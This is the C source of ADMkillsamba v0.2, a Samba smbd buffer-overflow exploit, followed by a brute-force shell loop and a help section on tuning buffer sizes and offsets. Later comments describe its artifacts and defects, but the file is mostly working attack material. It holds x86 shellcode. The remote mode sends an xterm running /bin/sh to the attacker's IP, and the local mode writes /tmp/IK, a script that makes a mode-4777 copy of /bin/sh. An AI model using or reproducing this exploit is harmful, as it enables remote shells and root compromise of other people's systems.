ADMultimateSMBsploit
92fe9ece9ee952039f23cb9b7dfce17aeaef6bbddf09c009b54fa2b0997b8e62
/* ___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''
ADMkillsamba ver 0.2 argh ADM back again ! :)))
what's new ?: i have included a krad help & a very fast utility for finding
smb servers <note: u can use it for finding imapd :)> ; a shell script for making
brute-force buff/offset for the sploit heh a lot of surprises < hahah supeer:)
the buffer have a better structure <4 a better world ??> & option for local
sploit :) cya ppl
admsmb@hotmail.com <note: is only for smbd sploit ! ADM have no email etc */
/* ADMkillsamba-v0.2.c */
#define DEFAULT_OFFSET 3500       /* subtracted from 0xbffffff0 in main() to form the address repeated through the buffer; argv[6] overrides */
#define DEFAULT_BUFFER_SIZE 3081  /* byte length of the buffer handed to smbclient; argv[5] overrides */
#define NOP 0x90                  /* x86 one-byte NOP; main() fills the first half of the buffer with it */
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
/* Remote payload: 54 bytes of raw x86 code (contains \xcd\x80, the Linux
   int 0x80 syscall instruction) placed in a 500-byte array so that main()
   can strcat() the xterm command string, its argument string and a trailer
   behind it in 'R' mode, and patch shellcode[4] in place. The array is a
   writable global; nothing bounds the later appends to 500 bytes. */
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
/* Local payload, copied over `shellcode` in 'L' mode. Its trailing string is
   the path /tmp/IK, the helper script main() writes to disk; presumably the
   stub executes that path (confirm by disassembly). Artifact worth watching
   for: /tmp/IK and the /tmp/.sh-r00t file the script creates. */
unsigned char localshell[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/IK";
/*
 * Entry point. argv[1] selects the mode: 'R' (remote) appends an xterm
 * command aimed at argv[4] to `shellcode`; 'L' (local) replaces `shellcode`
 * with `localshell` and writes a helper script to /tmp/IK. Both modes then
 * fill a `bsize`-byte heap buffer with a repeated address, a NOP run and the
 * shellcode, and exec ./smbclient with that buffer as the argument after the
 * "\\NAME\IPC$" service string. On success execl() never returns.
 *
 * Observable artifacts (all visible in this function): an smbclient process
 * launched with an overlong (default 3081-byte) argument and a "-I <ip>"
 * option; in local mode the files /tmp/IK and, once the script runs,
 * /tmp/.sh-r00t (a mode-4777 copy of /bin/sh).
 *
 * Defects in this code itself: `void main` is non-standard; execl() has no
 * prototype (no <unistd.h>), strcat/strcpy/strlen come from <string.h>, not
 * <strings.h>; only `argc < 3` is checked but argv[3]/argv[4] are read in
 * 'R' mode; every argv copy below is unbounded; fopen()/malloc() failures are
 * handled poorly or not at all; the address fill assumes sizeof(long) == 4.
 */
void main(int argc, char *argv[]) {
FILE *filez;                 /* /tmp/IK, local mode only */
char *buff, *ptr;            /* heap buffer passed to smbclient; ptr walks it */
long *addr_ptr, addr;        /* addr = 0xbffffff0 - offset, written through addr_ptr */
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
char netbios_name[100];      /* argv[3] ('R') or argv[2] ('L'), unbounded strcpy */
char bufferz[255];           /* "\\\\NAME\\IPC$" service string built by sprintf */
char ipz[40];                /* value of smbclient's -I option */
char myipz[40];              /* declared but never used */
unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";   /* trailer appended after arg1; bla[2] is patched below */
int *ret;                    /* unused */
unsigned char cmd[50]="/usr/X11R6/bin/xterm\xff-display\xff";  /* remote command; \xff bytes act as separators */
unsigned char arg1[50];      /* "<argv[4]>:0 -e /bin/sh" with \xff separators, built by sprintf */
int i;
bzero(netbios_name,100);
bzero(bufferz,255);
bzero(ipz,40);
bzero(ipz,40);               /* ipz is cleared twice; myipz is never cleared (harmless, it is unused) */
if(argc <3){
printf(" usage Remote: ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buff size] [offset size]\n");
printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.cc !\n");
printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname or ADMhack\n");
printf("<your ip> = the sploit send a xterm to your machine heh \n");
printf("option:\n");
printf("[buff size] = the size of the buffer to send default is 3081 try +1 -1 to a plage of +10 -10\n");
printf("[offset size] = the size of the offset default is 3500 try +50 -50 to a plage of 1000 -1000\n");
printf("usage Local: ADMkillsamba L <netbios name> [buffer size] [offset size]\n");
printf(" HaVe Fun\n");
exit(0);
}
if(*(argv[1]+0)=='R'){
printf("Remote sploit\n");
/* argv[4] is dereferenced although only argc >= 3 was checked; the sprintf
   into the 50-byte arg1 has no length limit. */
sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[4]);
/* Patch two one-byte displacements so the code still reaches its targets
   after cmd and arg1 (variable length) are inserted: shellcode[3] is 0xeb
   (short jmp) and bla[1] is 0xe8 (call) -- presumably; confirm against a
   disassembly. The cast applies to the constant only; the size_t sum is
   truncated to a byte on assignment. */
shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);
if (argc > 5) bsize = atoi(argv[5]);     /* atoi: no error or range check; 0 or negative reaches malloc and buff[bsize - 1] */
if (argc > 6) offset = atoi(argv[6]);
/* Append cmd, arg1, the trailer and 72 bytes of 'x' padding to the 500-byte
   shellcode array. No bound check against sizeof shellcode. */
strcat(shellcode,cmd);
strcat(shellcode,arg1);
strcat(shellcode,bla);
strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx");
/* Unbounded copies into ipz[40] and netbios_name[100]; argv[3] is unchecked. */
strcpy(ipz,argv[2]); /* haha u can overflow my sploit :) */
strcpy(netbios_name,argv[3]);
}
if(*(argv[1]+0)=='L'){
printf("Local sploit\n");
strcpy(shellcode,localshell);            /* replaces the remote payload; localshell ends with the path /tmp/IK */
strcpy(netbios_name,argv[2]);
strcpy(ipz,"127.0.0.1");
/* Write the helper script named inside localshell. It leaves two artifacts:
   /tmp/IK itself and, when run, /tmp/.sh-r00t, a mode-4777 copy of /bin/sh.
   fopen() is not checked, so a NULL filez is passed straight to fprintf. */
filez=fopen("/tmp/IK","w+");
fprintf(filez,"#!/bin/sh\n");
fprintf(filez,"cp /bin/sh /tmp/.sh-r00t\n");
fprintf(filez,"chmod 4777 /tmp/.sh-r00t\n");
fflush(filez);
fclose(filez);
system("chmod a+x /tmp/IK");             /* shell invocation; return value ignored */
}
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);                                 /* reports failure with exit status 0 */
}
/* Eight backslashes in the literal produce four at runtime, four produce two:
   the resulting string is \\\\NAME\\IPC$ . bufferz is 255 bytes; netbios_name
   is at most 99 characters here, so this one does fit. */
sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);
addr = 0xbffffff0 - offset ;
printf("Using address: 0x%x\n", addr);   /* %x with a long argument: mismatched on LP64 */
/* Fill buff with copies of addr. i advances by 4 but each store writes
   sizeof(long) bytes, so the loop assumes a 32-bit long; on LP64 it writes
   2*bsize bytes and overruns the allocation. */
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
/* First half of the buffer becomes a NOP run. */
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
/* Centre the shellcode on bsize/2; it overwrites the tail of the NOP run and
   the head of the address run. int/size_t mixing in the comparison. */
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';                  /* NUL-terminate so buff is usable as an argv string */
/* Replace this process with ./smbclient (relative path, so cwd-dependent).
   buff is the argument following the service name -- presumably smbclient's
   password argument. execl has no prototype here and its failure is not
   handled: on error main() simply falls off the end. */
execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);
}
--------------------------------small help------------------------------------
ADMsmb HELP v0.1
( a krad help =) )
Q: why does the sploit always give me the msg Broken pipe ???
A: ok diz msg appears when you do not have the right buffer_size/offset values
yes diz params change on every machine ! u must find them! for that try
a brute force on the buff/offset, see the script :)
-------------------------------Brutal Force-----------------------------------
#!/bin/sh
# Parameter-sweep driver for the program above. The outer loop never
# terminates: BUFF starts at 3081 and grows by 1 forever; for each BUFF the
# inner loop tries every offset D from 1000 up to (but not including) 8000 in
# steps of 25, running the program once per pair and echoing D and BUFF after
# each attempt. One full inner pass is 280 launches, so a sweep produces a
# large, easily noticed burst of smbclient connections.
declare -i D
declare -i OFF                     # declared but never used
declare -i try                     # declared but never used
declare -i BUFF
BUFF=3081 # buffer size
while true
do
D=1000 # offset
while test "$D" -lt 8000
do
# Angle-bracket tokens are placeholders, not shell syntax.
./ADMkillsamba <ip of the victim> <netbios name of the vic> <your iP> $BUFF $D
echo
echo $D                            # offset just tried
echo $BUFF                         # buffer size just tried
echo
D=D+25
done
BUFF=BUFF+1
done
---------------------------------------------------------------------------------
Q: what is the best param for buff/offst .?
A: first try with diz param buffer=3081 offset=3500 if is dont work try
to change the offset size 1000 at 8000 if he dont run try buff size 3075
at 3090 i know its hard but with experience its simple =)
Q: how to find the buff size ??
A: simple ! launch ADMkillsamba with buff size=1000; if the srv doesn't give
a broken pipe the buffer was too small, so try in steps of 100; when the srv
gives u a broken pipe, try to find the precise value ! and make a scan on
it =)
ex: buff = 3000 no broken pipe
buff = 3100 broken pipe
buff = 3050 no broken pipe
buff = 3070 broken pipe < scan to 3070 at 3100
Q: the offset size ??
A: Scan it :)
PS: if u find an offset & buff size on a system plz send it, i'm gonna make
a list of the most current buff sizes
PPS: if u wanna code a char shell for a other OS mail me !
news: ADM is gonna make a home page for diz sploit, don't forget to check it for
more help, tips/etc
cya
--------------------------------------------------------------------------------
U CAN GET THE BIN OF ADMFINDALL IN FTP.JANOVA.ORG/PUB/ADM !!!!!!